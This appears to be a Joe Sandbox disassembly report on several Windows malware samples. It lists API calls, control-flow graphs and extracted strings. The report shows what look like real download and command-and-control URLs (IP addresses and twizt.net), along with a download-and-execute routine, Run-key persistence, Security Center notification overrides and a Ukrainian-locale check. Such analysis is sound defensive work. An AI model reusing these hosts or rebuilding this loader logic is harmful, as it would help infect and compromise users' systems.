                                                                                • String ID: http://185.215.113.66/1$http://185.215.113.66/2$http://185.215.113.66/3$http://185.215.113.66/4$http://185.215.113.66/5$http://185.215.113.66/6$http://185.215.113.66/_1$http://185.215.113.66/_2$http://185.215.113.66/_3
                                                                                • API String ID: 1624407425-19798704
                                                                                • Opcode ID: 05370f1475e02d0ea9ffac473329103bfe7c57124054a9ccf712039674ac7d83
                                                                                • Instruction ID: 1042aadee2afd0ae0d37f72a0764f330d006b349a4d5d18a2a4ac178c6417c8f
                                                                                • Opcode Fuzzy Hash: 05370f1475e02d0ea9ffac473329103bfe7c57124054a9ccf712039674ac7d83
                                                                                • Instruction Fuzzy Hash: 84F05E75281F15FB8B0367E5AC4FDDB3A6CAB48B52F400112F24AD52D1CA974448DBF6

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 5 391000-39104b ExpandEnvironmentStringsW wsprintfW 7 39104d-39104f 5->7 8 391053-39107c 5->8 9 39108d-391090 7->9 11 39108b 8->11 12 39107e-391084 8->12 11->9 12->11
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 0039101A
                                                                                • wsprintfW.USER32 ref: 00391033
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 00391043
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00391069
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00391085
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.1922496157.0000000000391000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00390000, based on PE: true
                                                                                • Associated: 0000000D.00000002.1922475948.0000000000390000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 0000000D.00000002.1922526704.0000000000394000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_390000_2711236308.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                • String ID: %s\ssss3444443.jpg$%userprofile%$@1Wu.Wu$^Iu
                                                                                • API String ID: 750032643-433313667
                                                                                • Opcode ID: 9dc2a1ce49239c667d9fa1f53f7c3a5d323799eb59411c69ab1708e2fbc6682e
                                                                                • Instruction ID: 575f0d43af3da0d61b79316b1e6cf10377f7751298d6b4f98fd67fe2ad20f3a7
                                                                                • Opcode Fuzzy Hash: 9dc2a1ce49239c667d9fa1f53f7c3a5d323799eb59411c69ab1708e2fbc6682e
                                                                                • Instruction Fuzzy Hash: 6B018FB0540708BBDB31DB609C4AFE7733CAB44704F0046A5B759A62D1DAB26AC8DBA5

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 000F1850
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 000F18E8
                                                                                • GetLastError.KERNEL32 ref: 000F18F4
                                                                                • ExitProcess.KERNEL32 ref: 000F1903
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000F196D
                                                                                • PathFindFileNameW.SHLWAPI(?), ref: 000F197A
                                                                                • wsprintfW.USER32 ref: 000F1999
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F19A9
                                                                                • wcscmp.MSVCR90 ref: 000F19C2
                                                                                • ExitProcess.KERNEL32 ref: 000F19E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteErrorFindLastModuleMutexPathSleepwcscmpwsprintf
                                                                                • String ID: %s%s$%s:Zone.Identifier$%s\%s$%s\%s$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Service$http://185.215.113.66/$http://193.233.132.177/$http://91.202.233.141/$winploravr.exe$xouauxuax
                                                                                • API String ID: 1209637258-903396872
                                                                                • Opcode ID: 7c804d89a22ff09a3cd485efbf2f0b17c89f8a7c361f37f914a71c0071cf6680
                                                                                • Instruction ID: 97c0d90c167154f9c44dcce716dcef57515f2154185c11c4c7d5484db9193f02
                                                                                • Opcode Fuzzy Hash: 7c804d89a22ff09a3cd485efbf2f0b17c89f8a7c361f37f914a71c0071cf6680
                                                                                • Instruction Fuzzy Hash: 7AF141F1A40318BBEB20DB60DC49FF97779AB48714F008589B309AA590DBB59B84EF54

                                                                                Control-flow Graph
                                                                                • [graph image not reproduced] Basic blocks f1100-f131c: CryptImportKey → CreateFileW → GetFileSize → CreateFileMappingA → MapViewOfFile → CryptCreateHash → GetProcessHeap/HeapAlloc → call f1020 + CryptHashData → CryptVerifySignatureA → memcpy → GetProcessHeap/HeapFree → UnmapViewOfFile → CloseHandle → SetFilePointer/SetEndOfFile → CloseHandle → CryptDestroyKey; failure edges from each API call skip forward to the cleanup blocks.
                                                                                APIs
                                                                                • CryptImportKey.ADVAPI32(?,000F31C8,00000214,00000000,00000000,00000000), ref: 000F112A
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 000F114B
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 000F1164
                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 000F1185
                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 000F11A4
                                                                                • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 000F11F6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F122D
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 000F1234
                                                                                  • Part of subcall function 000F1020: memcpy.MSVCR90 ref: 000F107F
                                                                                  • Part of subcall function 000F1020: memcpy.MSVCR90 ref: 000F1093
                                                                                  • Part of subcall function 000F1020: CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 000F10B7
                                                                                  • Part of subcall function 000F1020: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 000F10DD
                                                                                  • Part of subcall function 000F1020: CryptDestroyKey.ADVAPI32(00000000), ref: 000F10F0
                                                                                • CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 000F1274
                                                                                • CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 000F1295
                                                                                • memcpy.MSVCR90 ref: 000F12AF
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F12BD
                                                                                • HeapFree.KERNEL32(00000000), ref: 000F12C4
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 000F12CE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 000F12D8
                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 000F12F2
                                                                                • SetEndOfFile.KERNEL32(000000FF), ref: 000F12FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 000F1306
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 000F1310
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
                                                                                • String ID: NGS!
                                                                                • API String ID: 1316431928-4070929822
                                                                                • Opcode ID: 5a5fd0ec1130c74910eed70dd62d30d619bf378b1ed78d859bca6030c1c63df5
                                                                                • Instruction ID: e4aac0360d638e9c61bca7d8b567fafb489b8c743491883116f5b986afa3bd43
                                                                                • Opcode Fuzzy Hash: 5a5fd0ec1130c74910eed70dd62d30d619bf378b1ed78d859bca6030c1c63df5
                                                                                • Instruction Fuzzy Hash: 5B613975A00209EFEB14CBE4DC59FFEBBB5AB48710F108548F701A7680CB75AA40DBA4

                                                                                Control-flow Graph
                                                                                • [graph image not reproduced] Basic blocks f1020-f10fc: memcpy * 2 → CryptImportKey → (on success) CryptEncrypt → CryptDestroyKey → exit at f10f6; an import failure branches straight to the exit block.
                                                                                APIs
                                                                                • memcpy.MSVCR90 ref: 000F107F
                                                                                • memcpy.MSVCR90 ref: 000F1093
                                                                                • CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 000F10B7
                                                                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 000F10DD
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 000F10F0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$memcpy$DestroyEncryptImport
                                                                                • String ID:
                                                                                • API String ID: 774555595-0
                                                                                • Opcode ID: f27ddcf31f0ccf8d14d05301f552e1fc05770f37aa3b9fac729ec3f4d52796b1
                                                                                • Instruction ID: 157e600ea33bae86b40f7357b2677961554f0a3cc3a5190920626afbc77ecefb
                                                                                • Opcode Fuzzy Hash: f27ddcf31f0ccf8d14d05301f552e1fc05770f37aa3b9fac729ec3f4d52796b1
                                                                                • Instruction Fuzzy Hash: D13127B1D0024DEFEB04CFE8C845BEEBBB4AF4C700F008159EA05B7281DA759A44DBA5

                                                                                Control-flow Graph
                                                                                • [graph image not reproduced] Basic blocks f1740-f1787: memset → GetLocaleInfoA → strcmp, then a two-way branch (f177e or f1782) that merges at the return block f1784.
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 000F174E
                                                                                • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A), ref: 000F1763
                                                                                • strcmp.MSVCR90 ref: 000F1772
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocalememsetstrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3255129521-64918367
                                                                                • Opcode ID: 893b299706533377114fa1722121b7f30a1234752ebdf7a218a128030e73bd5f
                                                                                • Instruction ID: 033f843784436d9f458092231ae39eb47f6d84209116a864bda993dec2d330df
                                                                                • Opcode Fuzzy Hash: 893b299706533377114fa1722121b7f30a1234752ebdf7a218a128030e73bd5f
                                                                                • Instruction Fuzzy Hash: 4BE0D876E4430CB6EA00B6A09C07FF933685B11B11F000154BF08564C1F5B56308E7D2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 000F1329
                                                                                • srand.MSVCR90 ref: 000F1330
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 000F1350
                                                                                • strlen.MSVCR90 ref: 000F135A
                                                                                • mbstowcs.MSVCR90 ref: 000F1371
                                                                                • rand.MSVCR90 ref: 000F1379
                                                                                • rand.MSVCR90 ref: 000F138D
                                                                                • wsprintfW.USER32 ref: 000F13B4
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 000F13CA
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 000F13F9
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 000F1428
                                                                                • memset.MSVCR90 ref: 000F144F
                                                                                • InternetReadFile.WININET(00000000,?,00000207,?), ref: 000F1471
                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 000F14A2
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 000F14B1
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F14BC
                                                                                • wsprintfW.USER32 ref: 000F14D5
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F14E5
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F14F0
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F1511
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F153E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 000F154B
                                                                                • InternetCloseHandle.WININET(00000000), ref: 000F1558
                                                                                • InternetCloseHandle.WININET(00000000), ref: 000F1565
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F1570
                                                                                • rand.MSVCR90 ref: 000F1585
                                                                                • Sleep.KERNEL32 ref: 000F159C
                                                                                • rand.MSVCR90 ref: 000F15A2
                                                                                • rand.MSVCR90 ref: 000F15B6
                                                                                • wsprintfW.USER32 ref: 000F15D7
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 000F15E7
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 000F1601
                                                                                • wsprintfW.USER32 ref: 000F161D
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F162D
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F1638
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F1659
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F1677
                                                                                Strings
                                                                                • %ls:Zone.Identifier, xrefs: 000F1611
                                                                                • %ls:Zone.Identifier, xrefs: 000F14C9
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 000F13C5
                                                                                • %temp%, xrefs: 000F134B
                                                                                • %s\%d%d.exe, xrefs: 000F13A8
                                                                                • %s\%d%d.exe, xrefs: 000F15CB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$Open$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcsmemsetsrandstrlen
                                                                                • String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 789862300-1471993759
                                                                                • Opcode ID: 12eadcd23e50ae10f648dd8b974eeade731544c26e81292906ac62b8de2cb475
                                                                                • Instruction ID: 0f1f4806a6b9605451ee63e61d4aaf383e1141860910ff2abb3c88431789e33a
                                                                                • Opcode Fuzzy Hash: 12eadcd23e50ae10f648dd8b974eeade731544c26e81292906ac62b8de2cb475
                                                                                • Instruction Fuzzy Hash: 1181C2B1900318EBEB20DB60DC4AFF97379BB88700F044598B30A964C1DE79AB94DF61

                                                                                Control-flow Graph
                                                                                • [graph image not reproduced] Basic blocks f1690-f173b: memset * 2 → CreateProcessW; on success Sleep, otherwise fall back to ShellExecuteW followed by Sleep; both paths merge at f1738.
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 000F169E
                                                                                • memset.MSVCR90 ref: 000F16AE
                                                                                • CreateProcessW.KERNEL32(00000000,000F166B,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 000F16E7
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F16F7
                                                                                • ShellExecuteW.SHELL32(00000000,open,000F166B,00000000,00000000,00000000), ref: 000F1712
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F172C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: 77f7144955fe5e9f31eb8a494b4ba7dd5fadf17a65b45c204d1c9c877d679f05
                                                                                • Instruction ID: d564bc9db316c30c3365800056af46fa3644857266c858808269b2fb193f5119
                                                                                • Opcode Fuzzy Hash: 77f7144955fe5e9f31eb8a494b4ba7dd5fadf17a65b45c204d1c9c877d679f05
                                                                                • Instruction Fuzzy Hash: C5110D75A8430CFAEB50DB90CC46FEE7778AB54B01F200115FB096E6C1DAB5AA04EB65

                                                                                Control-flow Graph
                                                                                • [graph image not reproduced] Basic blocks f1790-f1839: InternetOpenA → InternetOpenUrlA → HttpQueryInfoA → InternetCloseHandle (URL handle) → InternetCloseHandle (session handle) → Sleep; a failed open or query skips forward to the matching close block.
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 000F17A7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 000F17C6
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 000F17EF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 000F1818
                                                                                • InternetCloseHandle.WININET(00000000), ref: 000F1822
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F182D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 000F17A2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmp
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-173034443
                                                                                • Opcode ID: aecbc283a0eea4feeddc97f2b865fe40bdd3e107a3730773634e852bc6254087
                                                                                • Instruction ID: 77191dd966f3ce6a30a69c1824d65f0e7e8feb7d30b5257fed7b5d34fc112150
                                                                                • Opcode Fuzzy Hash: aecbc283a0eea4feeddc97f2b865fe40bdd3e107a3730773634e852bc6254087
                                                                                • Instruction Fuzzy Hash: 6A212975A40208FBEB10DF94CD49FEEB7B5BB08714F108098EA11AB6C0CBB56A01DB61

                                                                                Callgraph

                                                                                Control-flow Graph
                                                                                • [graph image not reproduced] Basic blocks 6f1070-6f1100: ExpandEnvironmentStringsW → wsprintfW, then a branch at 6f10bb (early exit via 6f10bd, or the 6f10c3-6f10fb path) that merges at the return block 6f10fd.
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 006F108A
                                                                                • wsprintfW.USER32 ref: 006F10A3
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 006F10B3
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 006F10D9
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 006F10F5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2003442179.00000000006F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000000F.00000002.2003429763.00000000006F0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000F.00000002.2003467319.00000000006F4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_6f0000_330125677.jbxd
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateEnvironmentExistsExpandFindNotificationPathStringswsprintf
                                                                                • String ID: %s\78876rtb.jpg$%userprofile%$@1Wu.Wu$^Iu
                                                                                • API String ID: 2220190937-2331256390
                                                                                • Opcode ID: 95373204f9fa5ba72059cce2e51ef5323c26879b54b389334b5b750989675ec3
                                                                                • Instruction ID: 4e93a139ad326d4f6bf83e4263b46e36b6481fd98477ee5abad2a79c24efadd8
                                                                                • Opcode Fuzzy Hash: 95373204f9fa5ba72059cce2e51ef5323c26879b54b389334b5b750989675ec3
                                                                                • Instruction Fuzzy Hash: BD017CF154030DABDB309B609C4AFF5733AAB40704F0045A4A729A61D1DEB05AC5DFA9

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 006F1013
                                                                                • InternetOpenUrlA.WININET(00000000,http://twizt.net/ALLSTATA,00000000,00000000,00000000,00000000), ref: 006F1033
                                                                                • Sleep.KERNELBASE(000003E8), ref: 006F1041
                                                                                • InternetCloseHandle.WININET(?), ref: 006F104B
                                                                                • Sleep.KERNELBASE(000003E8), ref: 006F1056
                                                                                • InternetCloseHandle.WININET(00000000), ref: 006F1060
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 006F100E
                                                                                • http://twizt.net/ALLSTATA, xrefs: 006F102A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2003442179.00000000006F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000000F.00000002.2003429763.00000000006F0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000F.00000002.2003467319.00000000006F4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_6f0000_330125677.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpenSleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$http://twizt.net/ALLSTATA
                                                                                • API String ID: 256278798-1206238961
                                                                                • Opcode ID: a38da9d5d7e2389ff1880bb266c34853cc74d8cff617011996f3803eb32f657f
                                                                                • Instruction ID: f31ceba6b2e68ddeba90189190b3a30b0697a2d68274bf475e1fc9019be60b3d
                                                                                • Opcode Fuzzy Hash: a38da9d5d7e2389ff1880bb266c34853cc74d8cff617011996f3803eb32f657f
                                                                                • Instruction Fuzzy Hash: 14F01D76A80309FBE7209BA4DC5AFAD7B36AB44B01F204144BB056A2D0CEB06584DF39

Control-flow Graph
• Block 11: 6f1110-6f1128 (Sleep, call 6f1070)
• Block 14: 6f112f-6f1132
• Block 15: 6f112a (call 6f1000)
• Edges: 11->14, 11->15, 15->14
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 006F1118
                                                                                  • Part of subcall function 006F1070: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 006F108A
                                                                                  • Part of subcall function 006F1070: wsprintfW.USER32 ref: 006F10A3
                                                                                  • Part of subcall function 006F1070: PathFileExistsW.KERNELBASE(?), ref: 006F10B3
                                                                                  • Part of subcall function 006F1000: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 006F1013
                                                                                  • Part of subcall function 006F1000: InternetOpenUrlA.WININET(00000000,http://twizt.net/ALLSTATA,00000000,00000000,00000000,00000000), ref: 006F1033
                                                                                  • Part of subcall function 006F1000: Sleep.KERNELBASE(000003E8), ref: 006F1041
                                                                                  • Part of subcall function 006F1000: InternetCloseHandle.WININET(?), ref: 006F104B
                                                                                  • Part of subcall function 006F1000: Sleep.KERNELBASE(000003E8), ref: 006F1056
                                                                                  • Part of subcall function 006F1000: InternetCloseHandle.WININET(00000000), ref: 006F1060
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2003442179.00000000006F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000000F.00000002.2003429763.00000000006F0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000F.00000002.2003467319.00000000006F4000.00000002.00000001.01000000.0000000E.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_6f0000_330125677.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Sleep$CloseHandleOpen$EnvironmentExistsExpandFilePathStringswsprintf
                                                                                • String ID:
                                                                                • API String ID: 3964721517-0
                                                                                • Opcode ID: b03f7d65d66b2dacf12e56ff20ca5e41222fb2fad0e67ac63699144752fffdaf
                                                                                • Instruction ID: 37c4f2c4d36b78e06b84caa4d754e5d07844fb906114f7abc1a2afce9f208339
                                                                                • Opcode Fuzzy Hash: b03f7d65d66b2dacf12e56ff20ca5e41222fb2fad0e67ac63699144752fffdaf
                                                                                • Instruction Fuzzy Hash: 42C08C3110428EA2928073B26C0A736318A4B033D1F005023B300CC0D6DD42D840E4BA

                                                                                Callgraph

Control-flow Graph
• Block 0: ae10a0-ae10b8 (Sleep, call ae1000)
• Block 3: ae111d-ae1120
• Block 4: ae10ba-ae1117 (DeleteUrlCacheEntry x 9)
• Edges: 0->3, 0->4, 4->3
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00AE10A8
                                                                                  • Part of subcall function 00AE1000: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00AE101A
                                                                                  • Part of subcall function 00AE1000: wsprintfW.USER32 ref: 00AE1033
                                                                                  • Part of subcall function 00AE1000: PathFileExistsW.KERNELBASE(?), ref: 00AE1043
